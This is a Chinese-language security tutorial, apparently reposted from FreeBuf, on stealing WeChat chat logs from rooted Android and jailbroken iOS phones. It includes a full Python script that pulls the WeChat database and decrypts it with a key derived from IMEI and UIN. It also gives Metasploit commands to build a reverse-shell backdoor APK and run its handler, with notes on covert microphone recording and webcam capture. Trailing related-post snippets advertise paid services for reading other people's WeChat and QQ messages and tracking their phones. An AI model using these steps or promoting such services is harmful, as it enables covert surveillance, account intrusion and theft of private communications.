移动安全初探：窃取微信聊天记录、Hacking Android with Metasploit

在这篇文章中我们将讨论如何获取安卓、苹果设备中的微信聊天记录，并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强，有设备的童鞋不妨边阅读文章边操作，希望能激发大家对移动终端的安全兴趣。

(文章内容存在一定攻击性，目的在于普及终端安全知识、提高安全意识，如有非法使用，后果自负)

“如何获取Android、iPhone手机上的微信聊天记录？ ”

0×00 条件：

安卓设备已获取root权限，安装SSHDroid(通过ssh、ftp连接手机)

Apple设备越狱，安装OpenSSH插件

0×01 安卓：

很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。

安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如，你在安卓设备上安装了微信，那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。

Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下，微信App文件存放路径为：/data/data/com.tencent.mm/MicroMsg

首先通过FTP把文件down到本地：

以34位编码（类似于乱码）命名的文件夹中可找到微信账号的加密数据库文件：EnMicroMsg.db

用数据库管理器打开：提示加密或者不是数据库文件

这里可以用windows环境下的SQLite Database Browser浏览器打开：

提示输入密码：

那么，加密数据库使用的密码是什么呢？我们又该如何获取到这个密码？通过上网查资料了解到：微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。

微信账号uin：即user information 微信用户信息识别码，获取微信UIN的方式有两种：

1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;

2.通过抓取WEB版微信聊天的数据包获取到uin。

1.1 App 配置文件

find / -name “system_config_prefs.xml”

/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml

cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin

<int name="default_uin" value="146****21" />

1.2 谷歌chrome浏览器登陆WEB版微信：

登陆后新建窗口并访问chrome://net-internals/#events

发送信息抓包 find uin值

uin:146****21

通过上述两种方法找到的uin值是相同的。

安卓拨号界面输入*#06#获得手机IMEI码：354**********85

IMEI值+uin值组合即为354**********85146****21

md5: http://www.spriteking.com/cmd5/ 左侧加密

得到32位小写md5值：1cbf8b842f8bf650aa65e5d3ced07735取其前七位:1cbf8b8输入到sql浏览器中。

Linux、Mac用户也可以在终端执行：

echo -n "354**********85146****21" | md5sum | cut -c -7

成功打开微信的数据库文件：

Wechat2txt.py:gist.github.com

import os
import sys
import re
import hashlib
import csv
import time
import locale
import getopt

def get_db():
    os.popen(‘adb root‘).close()
    text = os.popen(
        ‘adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db‘).read()
    return text.splitlines()[- 1] if text else ‘‘

def get_default_uin():
    os.popen(‘adb root‘).close()
    text = os.popen(
        ‘adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml‘).read()
    default_uin = re.findall(
        ‘name="default_uin" value="([0-9]+)"‘, text)
    return default_uin[0] if default_uin else 0

def get_device_ID():
    text = os.popen(‘adb shell dumpsys iphonesubinfo‘).read()
    device_ID = re.findall(‘Device ID = ([0-9]+)‘, text)
    return device_ID[0] if device_ID else 0

def get_md5():
    default_uin = get_default_uin()
    device_ID = get_device_ID()
    if default_uin and device_ID:
        return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]
    return ‘‘

def parse_msgcsv(msgcsv):
    locale.setlocale(locale.LC_ALL, ‘‘)
    if hasattr(msgcsv, ‘title‘):
        msgcsv = [ooOoo0O + ‘\n‘ for ooOoo0O in msgcsv.splitlines()]
        pass
    OooO0 = csv.reader(msgcsv)
    OooO0.next()
    for ooOoo0O in OooO0:
        try:
            II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[
                : 12]
            pass
        except:
            continue
        ooooooO0oo = ‘me‘ if (Oo00OOOOO == ‘1‘) else name
        IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)
        I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)
        yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]
        pass
    pass

def get_names(chat):
    names = {}
    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
        names[name] = 1
        pass
    return names.keys()

def oo(chat, name=‘‘):
    text = []
    name = name.lower()
    for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
        iIi1ii1I1 = iIi1ii1I1.replace(‘\n‘, ‘\n  ‘)
        o0 = (‘\t‘ + o0) if o0 else ‘‘
        if not name:
            text.append(‘%s: %s %s: %s %s‘ %
                        (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
            pass
        elif name.lower() == name:
            text.append(‘%s %s: %s %s‘ %
                        (I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
            pass
        pass
    return ‘\n‘.join(text) + ‘\n‘

def IIIii1II1II(dbn, key=‘‘):
    child_stdin, child_stdout = os.popen2([‘sqlcipher‘, dbn])
    if key:
        child_stdin.write(‘PRAGMA key=%s;\n‘ % ` key `)
        child_stdin.write(‘pragma cipher_use_hmac=off;\n‘)
        pass
    child_stdin.write(‘.tables\n‘)
    child_stdin.close()
    return child_stdout.read().split()

def decrypt(dbn, key=‘‘, table=‘message‘):
    table = table or ‘message‘
    child_stdin, child_stdout = os.popen2([‘sqlcipher‘, dbn])
    child_stdin.write(‘.header on\n‘)
    child_stdin.write(‘.mode csv\n‘)
    if key:
        child_stdin.write(‘PRAGMA key=%s;\n‘ % ` key `)
        child_stdin.write(‘pragma cipher_use_hmac=off;\n‘)
        pass
    child_stdin.write(‘select * from %s;\n‘ % ` table `)
    child_stdin.close()
    return child_stdout.read()

def wechat2txt(names=[]):
    in_file = ‘EnMicroMsg.db‘
    out_file = ‘message.csv‘
    db = get_db()
    md5 = get_md5()
    os.popen(‘adb wait-for-device‘)
    os.popen(‘adb pull %s %s‘ % (db, in_file)).close()
    msgcsv = decrypt(in_file, md5)
    if msgcsv.find(‘\n‘) < 0:
        return 1
    file(out_file, ‘w‘).write(msgcsv)
    msgs = list(parse_msgcsv(msgcsv))
    if not msgs:
        return 1
    if not names:
        names = get_names(msgs)
        pass
    for name in names:
        filename = ‘message.%s.txt‘ % name
        text = oo(msgs, name)
        if len(text) > 4:
            file(filename, ‘w‘).write(text)
            pass
        pass
    pass

help_msg = ‘‘‘Usage: wechat2txt.py [OPTIONS] [NAME]...

OPTIONS:
    -h        display this help and exit
‘‘‘

def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], ‘h‘)
    except getopt.error, e:
        print help_msg
        return 1
    for opt, arg in opts:
        if opt == ‘-h‘:
            print help_msg
            return 1
        pass
    names = args
    text = wechat2txt(names)
    return not text

if __name__ == "__main__":
    sys.exit(main())

0×02 苹果：

Apple设备越狱后可通过Cydia安装各种小插件，通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中，并使用sftp传输文件：

iOS中，应用文件夹以hash值命名，要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。

在实际操作中我们可以通过巧用Linux命令（find、grep、xargs）来绕过这些坑。

find /var/mobile/Containers/Data -name "MM.sqlite" 

mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

在越狱iOS窃取隐私可参考：隐匿在iOS文件系统中的隐私信息一文

0×03 在安卓终端植入后门

3.1 实验环境

Kali Linux（Hack）：192.168.31.213

Android（靶机）：192.168.31.118

3.2生成后门文件：

cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

3.3 运行metasploit控制台

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run

3.4 安装&运行后门App

后门能进行什么操作？我们来看看usage：

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for ‘load‘
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

record_mic 通过手机麦克风进行窃听、录音；

webcam_list 列出安卓设备的所有摄像头；

webcam_snap 通过摄像头进行偷拍…

等等

0×04 演示视频

0×05 APK后门分析：

把apk放到apk分析工具（apkStudio、Bytecodeviewer）进行解包，我们来看看后门App的源码：

（apkStudio）

在smali/com/metasploit/stage/MainActivity.smali中我们可以找到后门服务器的ip端口配置：

（apkStudio）

（Bytecodeviewer）

0×06 预防&安全建议

安卓：从可信来源下载应用程序，避免感染恶意程序；在移动充电桩充电前及时关闭USB调试。

苹果：越狱后及时修改root密码，避免使用默认密码、弱口令。

0×07 文中工具下载地址：

SQLite Database Browser：http://pan.baidu.com/s/1nuWlDgd

SSHDroid：http://pan.baidu.com/s/1b6PBK6

0×08 参考&感谢

How To Decrypt WeChat EnMicroMsg.db Database?

Android微信数据导出

微信聊天记录分析

A look at WeChat security

https://gist.github.com/scturtle/724801

隐匿在iOS文件系统中的隐私信息

Hacking Android Smartphone Tutorial using Metasploit

原文地址：http://www.freebuf.com/articles/terminal/107801.html

时间： 2024-08-07 21:18:58

移动安全初探：窃取微信聊天记录、Hacking Android with Metasploit的相关文章

微信聊天记录查看器 - iOS版

本文版权归cxun所有,如有转载请注明出处与本文链接,谢谢!原文地址:http://www.cnblogs.com/cxun/p/4338643.html 摘要 iPhone中的微信是不是占用了越来越多的空间呢?不想删图片?不舍得删视频?那就转移到电脑硬盘上来吧,在Windows中使用本软件进行查看.搜索,手机上的空间就可以腾出来了!本文详细介绍了软件的使用说明,以及介绍了微信聊天记录数据存储格式,最后给出了本软件与源代码的下载地址. 1. 前言随着使用微信的日子变长,手机中微信所占用的空间也

微信聊天记录查看器（程序+源码） - iOS版

本文版权归cxun所有,如有转载请注明出处与本文链接,谢谢!原文地址:http://www.cnblogs.com/cxun/p/4338643.html 摘要 iPhone中的微信是不是占用了越来越多的空间呢?不想删图片?不舍得删视频?那就转移到电脑硬盘上来吧,在Windows中使用本软件进行查看.搜索,手机上的空间就可以腾出来了!本文详细介绍了软件的使用说明,以及介绍了微信聊天记录数据存储格式,并给出了本软件与源代码的下载地址,最后是iPhone聊天记录中图片与视频数据的清理方法. 1. 前

七款免费好用的微信聊天记录恢复软件推荐

微信聊天记录恢复软件能够彻底解决微信聊天记录删除了怎么恢复的难题,如果普通聊天记录恢复模式无法满足您的需求,那么深度恢复模式便可以最大程度的扫描出每一条残留的记录,通过智能解析出时间与类型,剔除乱码,让恢复更加优质.小编整理了七款免费好用的微信聊天记录恢复软件下载. 七款免费好用的微信聊天记录恢复软件推荐: 第1款: 楼月微信聊天记录导出恢复助手v4.3 免费版楼月微信聊天记录导出恢复助手能够能够在电脑上查看所有安卓及苹果手机上的微信聊天记录,所有文字聊天,语音聊天,收发的图片,小视频等都能在

手机端微信聊天记录数据库解密过程记录

出发点是想找回微信被撤回的信息. 根据<PC版QQ微信防撤回补丁>文章,拦截PC端的撤回函数,新的撤回消息将不会被撤回.但是打补丁前撤回的消息,依然无法查看. 之前发现,手机端的微信,图片.视频信息撤回后,可以在本地找到相应的记录.由此猜测,文本信息是否本地依然有记录.查询资料得知,文本的聊天记录,存放在Sqlite数据库中.本来想破解PC端的数据库,但是收集到的资料都是手机端的. 根据<手把手教你破解微信本地数据库(利用Sqlcipher查看)>和<Android动态破解微

怎么查别人微信聊天记录手机定位找人

微信是腾讯旗下的一款社交软件,和QQ有点类似,微信的记录大都数都是暂时的保存在手机内存卡里面的,会自动根据保存的数据大小不定时的情况一些记录,如果微信聊天记录被删除了应该怎么回复?正常情况下是不可能恢复的,如果有特别重要的信息,可以尝试把内存卡放到电脑上读取,利用数据回复工具,恢复内存卡数据.需要查别人的微信聊天记录的推荐找他查,我查老婆的qq和微信聊天记录都是找他查到的,他的QQ是408992299,信誉很好,非常专业,需要的找他. 一.微信记录的备份方法: 1.首先将把手机root下,这个就

怎么样找回微信聊天记录

微信聊天记录被不小心删除了,怎么样找回微信聊天记录?这个问题相信困扰了很多微信用户吧,因为在使用微信进行沟通聊天的时候,多多少少会出现这个情况.那么就和大家介绍一下,微信聊天记录恢复器吧,让大家轻松恢复丢失的微信聊天记录. 一.互盾苹果恢复大师 1.互盾苹果恢复大师是一款专为苹果用户设计的用于恢复微信聊天记录的恢复软件.恢复功能强大,可以通过iTunes备份文件以及从iPhone设备中扫描恢复,提高了微信记录的恢复概率. 苹果恢复大师http://www.orsoon.com/Soft/1473

看别人微信聊天记录

看别人微信聊天记录●●高手QQ:705099868●●以前也在网上找过关于[看别人微信聊天记录]以及怎么破解qq聊天记录密码视频,但是都没有找到好的怎么破解qq聊天记录密码方法.无意中接触到这个人,他是专门帮人查QQ密码,微信密码,查QQ聊天记录,恢复微信记录,通话记录,短信,手机定位等,很讲信誉,技术不错. http://www.155588.com

如何使用iTunes与iTools导出微信聊天记录

.tocblock .tocblock .tocblock { margin-left: 2.25em; } .madoko .toc>.tocblock .tocblock { margin-left: 1.5em; } .madoko .toc-contents>.tocblock>.tocitem { font-weight: bold; } .madoko .toc { margin-top: 1em; } .madoko p.para-continue { margin-bot

怎么查询别人的qq聊天记录.被删除的微信聊天记录还能恢复么

怎么查询别人的qq聊天记录.被删除的微信聊天记录还能恢复么--推荐他给你他{扣-扣} 56005049 手-机-定-位 QQ 微-信-查-看-记-录,监-控-手-机-微-信.手-机-清-单-等-等-我老婆手机通话清单,就是他帮我查的,他信誉很好,他的技术一流,我给他办过业务,好技术分享你我,新闻资讯顶,我给他办过业务,他人很好而且办事儿的速度快,是我见过技术最好的人了,认准竭诚为您排忧解难